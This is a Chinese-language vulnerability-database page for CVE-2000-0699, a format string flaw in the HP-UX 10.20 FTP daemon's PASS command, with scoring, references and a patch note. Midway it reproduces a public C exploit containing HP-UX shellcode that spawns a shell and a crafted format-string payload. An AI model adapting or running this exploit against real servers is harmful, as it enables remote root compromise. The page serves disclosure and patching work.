CVE-2000-0699
CVSS10.0
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:40
NMCOE    

[原文]Format string vulnerability in ftpd in HP-UX 10.20 allows remote attackers to cause a denial of service or execute arbitrary commands via format strings in the PASS command.


[CNNVD]HP-UX 10.20 ftp格式字符串漏洞(CNNVD-200010-129)

        HP-UX 10.20版本中ftpd存在格式字符串漏洞。远程攻击者可以借助PASS命令中的格式字符串来导致服务拒绝或执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0699
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0699
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-129
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1560
(VENDOR_ADVISORY)  BID  1560
http://archives.neohapsis.com/archives/bugtraq/2000-08/0028.html
(VENDOR_ADVISORY)  BUGTRAQ  20000806 HPUX FTPd vulnerability

- 漏洞信息

HP-UX 10.20 ftp格式字符串漏洞
危急 格式化字符串
2000-10-20 00:00:00 2005-05-02 00:00:00
远程  
        HP-UX 10.20版本中ftpd存在格式字符串漏洞。远程攻击者可以借助PASS命令中的格式字符串来导致服务拒绝或执行任意命令。

- 公告与补丁

        

- 漏洞信息 (212)

HP-UX FTPD Remote Buffer Overflow Exploit (EDBID:212)
hp-ux dos
2000-12-01 Verified
0 venglin
N/A [点击下载]
/* theoretical exploit for hpux ftpd vulnerability              */
/* not tested anywhere, needs tweaking                          */

/* (c) 2000 by babcia padlina ltd. <venglin@freebsd.lublin.pl>  */

#include <stdio.h>
#include <stdlib.h>

#define NOPS 100
#define BUFSIZE 1024

char shellcode[] =                       /*   HP-UX shellcode   */
  "\x34\x16\x05\x06\x96\xd6\x05\x34\x20\x20\x08\x01\xe4\x20\xe0\x08\x0b"
  "\x5a\x02\x9a\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41"
  "\x04\x02\x60\x40\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02"
  "\x98\x34\x16\x04\xbe\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34"
  "\xde\xad\xca\xfe\x2f\x62\x69\x6e\x2f\x73\x68";

char nop[] = "\x08\x21\x02\x80";                /*  PA-RISC NOP */

unsigned long ret = 0xdeadbeef;

int main(argc, argv)
int argc;
char **argv;
{
  int stackofs;
  char buf[BUFSIZ*2];
  int i;

  for (strcpy(buf, "PASS "),i=0;i<NOPS;i++) strcat(buf, nop);
  sprintf(buf+strlen(buf), "%s%%.%dd%c%c%c%c", shellcode,
    BUFSIZE-strlen(shellcode)-NOPS*4-4,
    ((int)ret & 0xff), (((int)ret & 0xff00) >> 8),
    (((int)ret & 0xff0000) >> 16),
    (((int)ret & 0xff000000) >> 24));
  printf("USER ftp\r\n%s\r\n", buf);

  exit(0);
}


// milw0rm.com [2000-12-01]
		

- 漏洞信息

389
HP-UX FTP Daemon PASS Command Remote Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

This host appears to be running a version of the HPUX FTP daemon which is vulnerable to a format string vulnerability in the PASS command. A potential intruder could exploit this vulnerability to gain remote access with super-user privileges (root).

- 时间线

2000-08-06 Unknow
Unknow Unknow

- 解决方案

The vendor has released a patch that fixes this issue. The patch can be found by navigating HP's web site, starting with the following URL: http://welcome.hp.com/country/us/eng/software_drivers.htm

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站